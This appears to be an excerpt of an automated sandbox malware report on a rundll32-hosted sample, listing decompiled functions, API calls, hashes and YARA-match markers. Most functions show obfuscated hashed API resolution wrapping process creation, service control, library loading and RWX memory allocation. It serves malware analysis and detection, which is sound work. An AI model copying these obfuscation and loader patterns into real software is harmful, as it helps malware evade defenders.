Instruction Fuzzy Hash: 6421C2B290020CBFEF019F95DD498DEBBB9FB55358F108198F92462250D7B69E249B90

Uniqueness

Uniqueness Score: -1.00%

Function 00211638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00211686

Strings

Link, xrefs: 00211666

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 6a6d88104237dc4b8c5b3d8edb39471506575ed97693b314d809d5232a8b54ab
Instruction ID: 6517be1365184f13e84a6774e0afe59f9227ccc03cbebac222e59bed42990fa5
Opcode Fuzzy Hash: 6a6d88104237dc4b8c5b3d8edb39471506575ed97693b314d809d5232a8b54ab
Instruction Fuzzy Hash: 8F11A370610740AFD714EF75CD82ACE77E9EF25700B905824F500D7AA1EB76FAA18B50

Uniqueness

Uniqueness Score: -1.00%

Function 002CEB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 002CEB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 002CEDD9

Memory Dump Source

Source File: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 4be563417b727907f374231dff579d078261ce90ab0c10ea6061ba94495c2b61
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 10C1C975A10209DFCB48CF88C590EAEB7B6BF88304F158259E8199B355D735EE52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00211A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00211AC8: DdeFreeStringHandle.USER32(?,?), ref: 00211AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00211A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00211A95

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 0ebf4a845f6c967fb6d5cf4d7a13192f806c80aa96365599836dbea7eb0cef55
Instruction ID: 8fb47a62c583bd9d52f1550e56e5e29f91aea65310da3fb8e72d21c77c7e31b6
Opcode Fuzzy Hash: 0ebf4a845f6c967fb6d5cf4d7a13192f806c80aa96365599836dbea7eb0cef55
Instruction Fuzzy Hash: F8115E357216546FDB11EFA4C8C2A9A3BECEF59B00B5145A0FD009B247DB70ED61C794

Uniqueness

Uniqueness Score: -1.00%

Function 001B7F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E001B7F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C2550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E001B7378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}

0x001b7f52
0x001b7f55
0x001b7f57
0x001b7f5a
0x001b7f5e
0x001b7f5f
0x001b7f64
0x001b7f6b
0x001b7f72
0x001b7f79
0x001b7f94
0x001b7f97
0x001b7f9e
0x001b7fa5
0x001b7fac
0x001b7fb3
0x001b7fba
0x001b7fbe
0x001b7fc5
0x001b7fcc
0x001b7fd3
0x001b7fd7
0x001b7feb
0x001b7ff7
0x001b7ffd

APIs

lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 001B7FF7

Strings

ZHq, xrefs: 001B7F6B

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: ZHq
API String ID: 1586166983-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: 97039cca646b5e9e4f62b9d84542901162c4919f0d7f8f4315a747103cbee243
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: 7C11DFB6C01219ABDF01DFA4C94A8DEBFB4FF04318F108588E92566251D3B95B15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002CE620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 002CE6A4

Strings

VirtualAlloc, xrefs: 002CE689, 002CE68C

Memory Dump Source

Source File: 0000000E.00000002.2347071363.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2b0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 4210cc9d95156a42b632354391d857c50c870963c70916673441f1780bbc2b45
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: DE114260D082C9DEEF01DBE88809BFFBFB55F21704F044198D5446B282D2BA5758CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 001CB86E, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E001CB86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C2550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E001B7378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}

0x001cb876
0x001cb87b
0x001cb87d
0x001cb87e
0x001cb881
0x001cb884
0x001cb887
0x001cb88a
0x001cb88d
0x001cb890
0x001cb891
0x001cb892
0x001cb893
0x001cb896
0x001cb897
0x001cb89a
0x001cb89d
0x001cb8a0
0x001cb8a4
0x001cb8a5
0x001cb8aa
0x001cb8bb
0x001cb8c3
0x001cb8c6
0x001cb8ca
0x001cb8d1
0x001cb8d8
0x001cb8df
0x001cb8e6
0x001cb8ed
0x001cb8f1
0x001cb8f4
0x001cb8fb
0x001cb902
0x001cb909
0x001cb928
0x001cb942
0x001cb949

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 001CB942

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction ID: 9332dc580d609f5bec8224ff8ede339d78ccdf48887b0c81067f0ad83966b9a7
Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction Fuzzy Hash: 0921C472800248BBDF169F95CD09CDFBFB9FF89714F408158FA1466260D7B69A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B471A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001B471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E001C2550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E001B7378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}

0x001b473b
0x001b4740
0x001b474a
0x001b4753
0x001b475a
0x001b4761
0x001b4765
0x001b476f
0x001b4772
0x001b4775
0x001b477c
0x001b4788
0x001b4789
0x001b478e
0x001b4792
0x001b4799
0x001b47aa
0x001b47ad
0x001b47b4
0x001b47d3
0x001b47e4
0x001b47ea

APIs

SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 001B47E4

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction ID: 4a025837ce0e329c8da2d4521be2178940e4233ca172387eb163c275c0a0aaec
Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction Fuzzy Hash: 732100B2D01208FBEF05DFE4C84A8DEBBB5EF45354F108089E924A6290D7B59B10EF90

Uniqueness

Uniqueness Score: -1.00%

Function 001C340E, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E001C340E(void* __ecx, void* __edx, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t45;
				void* _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(0);
				_push(0);
				E001C2550(_t45);
				_v28 = 0x755cc3;
				_v24 = 0;
				_v20 = 0xc93f;
				_v20 = _v20 >> 3;
				_t59 = 0x1a;
				_v20 = _v20 / _t59;
				_v20 = _v20 ^ 0x00003660;
				_v16 = 0x16ad;
				_v16 = _v16 + 0x57a7;
				_v16 = _v16 | 0xbe0b763b;
				_v16 = _v16 ^ 0xbe0b2e9f;
				_v12 = 0xa207;
				_v12 = _v12 + 0xb6;
				_t60 = 0x37;
				_v12 = _v12 * 0x38;
				_v12 = _v12 ^ 0x0023dbd3;
				_v8 = 0xebb1;
				_v8 = _v8 / _t60;
				_v8 = _v8 | 0x19ad118e;
				_v8 = _v8 ^ 0x19ad0924;
				E001B7378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
				_t57 = OpenSCManagerW(0, 0, _a12); // executed
				return _t57;
			}

0x001c3415
0x001c341a
0x001c341b
0x001c341e
0x001c3423
0x001c342d
0x001c3432
0x001c3439
0x001c3442
0x001c3447
0x001c344c
0x001c3453
0x001c345a
0x001c3461
0x001c3468
0x001c346f
0x001c3476
0x001c3481
0x001c348d
0x001c3490
0x001c3497
0x001c34a8
0x001c34ab
0x001c34b2
0x001c34c6
0x001c34d3
0x001c34d9

APIs

OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 001C34D3

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction ID: 4d283435763f4d0ffdecc190ef5a6dcd8530f348cbd4157d01b8bda78982d468
Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
Instruction Fuzzy Hash: A92113B1D0131DABDB08DFA9C84A8EFBBB4FB10314F10819AE414AA280D3B55B148B90

Uniqueness

Uniqueness Score: -1.00%

Function 001C0321, Relevance: 1.6, APIs: 1, Instructions: 59
serviceCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E001C0321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				void* _t56;
				void* _t59;
				int _t60;

				_push(_a12);
				_t60 = __edx;
				_t59 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001C2550(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xc39a9;
				_v20 = 0xd5ea;
				_v20 = _v20 | 0xff6e49b2;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0xfeddf181;
				_v12 = 0x5ebb;
				_v12 = _v12 * 0x36;
				_v12 = _v12 * 0x4e;
				_v12 = _v12 | 0x0415626f;
				_v12 = _v12 ^ 0x0617d8e0;
				_v16 = 0xb467;
				_v16 = _v16 << 4;
				_v16 = _v16 * 0x58;
				_v16 = _v16 ^ 0x03e03a17;
				_v8 = 0xc80e;
				_v8 = _v8 * 5;
				_v8 = _v8 * 0x5d;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x000b2851;
				E001B7378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
				return _t56;
			}

0x001c0329
0x001c032c
0x001c032e
0x001c0330
0x001c0333
0x001c0336
0x001c0337
0x001c0338
0x001c033d
0x001c0344
0x001c034b
0x001c0352
0x001c0359
0x001c035c
0x001c0363
0x001c037e
0x001c0386
0x001c0389
0x001c0390
0x001c0397
0x001c039e
0x001c03a6
0x001c03a9
0x001c03b0
0x001c03bb
0x001c03c2
0x001c03c5
0x001c03c9
0x001c03dc
0x001c03e9
0x001c03f0

APIs

OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 001C03E9

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction ID: 359e275325353e2585f42fabc9be0b29ae8cd1b90cfb9ba2b49e4802c70b44ea
Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
Instruction Fuzzy Hash: DC21FFB1C01209BBCB04DFA5C98A8DEBFB4FB45304F108099E825B6261D3B49B44DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001C49CF, Relevance: 1.6, APIs: 1, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E001C49CF(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				struct HINSTANCE__* _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;

				_push(_a4);
				E001C2550(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x2e62bd;
				_v12 = 0x9175;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 4;
				_t67 = 0x72;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x00007d95;
				_v20 = 0x6b8f;
				_v20 = _v20 + 0xab5d;
				_v20 = _v20 ^ 0x000118a2;
				_v16 = 0x74fd;
				_v16 = _v16 + 0xb2f4;
				_v16 = _v16 | 0x45835894;
				_v16 = _v16 ^ 0x45831718;
				_v8 = 0x475a;
				_t68 = 0x1a;
				_v8 = _v8 / _t68;
				_t69 = 0x71;
				_v8 = _v8 / _t69;
				_v8 = _v8 | 0x9a1a6af5;
				_v8 = _v8 ^ 0x9a1a601d;
				E001B7378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
				_t65 = LoadLibraryW(_a4); // executed
				return _t65;
			}

0x001c49d5
0x001c49da
0x001c49df
0x001c49e6
0x001c49ef
0x001c49f6
0x001c49fa
0x001c4a03
0x001c4a08
0x001c4a0d
0x001c4a14
0x001c4a1b
0x001c4a22
0x001c4a29
0x001c4a30
0x001c4a37
0x001c4a3e
0x001c4a45
0x001c4a4f
0x001c4a54
0x001c4a5c
0x001c4a64
0x001c4a67
0x001c4a6e
0x001c4a8d
0x001c4a98
0x001c4a9d

APIs

LoadLibraryW.KERNEL32(00007D95), ref: 001C4A98

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction ID: 26ebf6eb7a0de6ebad1a865db16cb031ecd06916b9e1d750f5c3cf5050c194a9
Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
Instruction Fuzzy Hash: 7421F9B5E0020CFBDB04CFE5D94A9EEBBB1EB51304F10C099E518A7291D7B56B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 001C41CA, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001C41CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t57;

				_t57 = __ecx;
				E001C2550(_t42);
				_v20 = 0x33dd;
				_t53 = 0x60;
				_v20 = _v20 / _t53;
				_v20 = _v20 ^ 0x0000445b;
				_v8 = 0x98b2;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x9f0dae98;
				_v8 = _v8 + 0xffff2dd8;
				_v8 = _v8 ^ 0x9f6f2800;
				_v16 = 0x7a4d;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x630ec107;
				_v16 = _v16 ^ 0x6301fd0c;
				_v12 = 0xd3a1;
				_v12 = _v12 ^ 0x9b5a4994;
				_v12 = _v12 + 0xffffbec0;
				_v12 = _v12 ^ 0x9b5a0da8;
				_t50 = E001B7378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
				return _t51;
			}

0x001c41d6
0x001c41e5
0x001c41ea
0x001c41fb
0x001c4203
0x001c4206
0x001c420d
0x001c4214
0x001c4218
0x001c421f
0x001c4226
0x001c422d
0x001c4234
0x001c4238
0x001c423f
0x001c4246
0x001c424d
0x001c4254
0x001c425b
0x001c427a
0x001c428a
0x001c4290

APIs

SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 001C428A

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction ID: b9105ef41c72f75be1dad6d4d935b74b54dbd18f559488a2ce3abd8a1f6f60a3
Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
Instruction Fuzzy Hash: 9B114A72E00308BBEB05DFA4CC4AAEEBBB5EF44710F108088E925662A1D7B55B109F80

Uniqueness

Uniqueness Score: -1.00%

Function 001B5AB8, Relevance: 1.6, APIs: 1, Instructions: 51
serviceCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E001B5AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				int _t57;
				signed int _t59;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001C2550(_t47);
				_v20 = 0xc8c;
				_v20 = _v20 + 0xffffaa04;
				_v20 = _v20 ^ 0xb702763d;
				_v20 = _v20 ^ 0x48fdd1a6;
				_v16 = 0xeb1c;
				_v16 = _v16 << 4;
				_t59 = 0xf;
				_v16 = _v16 * 0xe;
				_v16 = _v16 + 0xffff64c4;
				_v16 = _v16 ^ 0x00cd6bec;
				_v12 = 0x757;
				_v12 = _v12 ^ 0x4183b2e4;
				_v12 = _v12 << 2;
				_v12 = _v12 / _t59;
				_v12 = _v12 ^ 0x0067440e;
				_v8 = 0xa082;
				_v8 = _v8 >> 1;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xcec43627;
				_v8 = _v8 ^ 0xcec45939;
				E001B7378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
				_t57 = CloseServiceHandle(_a12); // executed
				return _t57;
			}

0x001b5abe
0x001b5ac1
0x001b5ac4
0x001b5ac9
0x001b5ace
0x001b5ad8
0x001b5ae1
0x001b5ae8
0x001b5aef
0x001b5af6
0x001b5b00
0x001b5b0b
0x001b5b0e
0x001b5b15
0x001b5b1c
0x001b5b23
0x001b5b2a
0x001b5b34
0x001b5b37
0x001b5b3e
0x001b5b45
0x001b5b48
0x001b5b4c
0x001b5b53
0x001b5b6c
0x001b5b77
0x001b5b7c

APIs

CloseServiceHandle.SECHOST(48FDD1A6), ref: 001B5B77

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction ID: 88aa3c85068f5d59bc225adca66ddd60c84a8091bbdf2497287d0385f1accd78
Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
Instruction Fuzzy Hash: 1F110371D0020DFFDB08DFA9C94A9EEBBB0FB40304F108599E525A6291D7B99B15DF40

Uniqueness

Uniqueness Score: -1.00%

Function 001BE554, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E001BE554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t42;
				int _t51;
				signed int _t53;
				struct _SHFILEOPSTRUCTW* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E001C2550(_t42);
				_v20 = 0xead4;
				_v20 = _v20 + 0xffff9be4;
				_v20 = _v20 ^ 0x000085bc;
				_v16 = 0x46f7;
				_v16 = _v16 << 0xe;
				_v16 = _v16 << 7;
				_t53 = 0x39;
				_v16 = _v16 / _t53;
				_v16 = _v16 ^ 0x03e8aab4;
				_v12 = 0x2beb;
				_v12 = _v12 ^ 0xafae01c3;
				_v12 = _v12 + 0xffff58eb;
				_v12 = _v12 ^ 0xa5118136;
				_v12 = _v12 ^ 0x0abc415f;
				_v8 = 0xa691;
				_v8 = _v8 ^ 0x7591c523;
				_v8 = _v8 << 0xa;
				_v8 = _v8 + 0x20df;
				_v8 = _v8 ^ 0x458ea297;
				E001B7378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
				_t51 = SHFileOperationW(_t57); // executed
				return _t51;
			}

0x001be55b
0x001be55e
0x001be560
0x001be562
0x001be567
0x001be571
0x001be57a
0x001be581
0x001be588
0x001be58c
0x001be595
0x001be59d
0x001be5a0
0x001be5a7
0x001be5ae
0x001be5b5
0x001be5bc
0x001be5c3
0x001be5ca
0x001be5d1
0x001be5d8
0x001be5dc
0x001be5e3
0x001be602
0x001be60b
0x001be611

APIs

SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 001BE60B

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
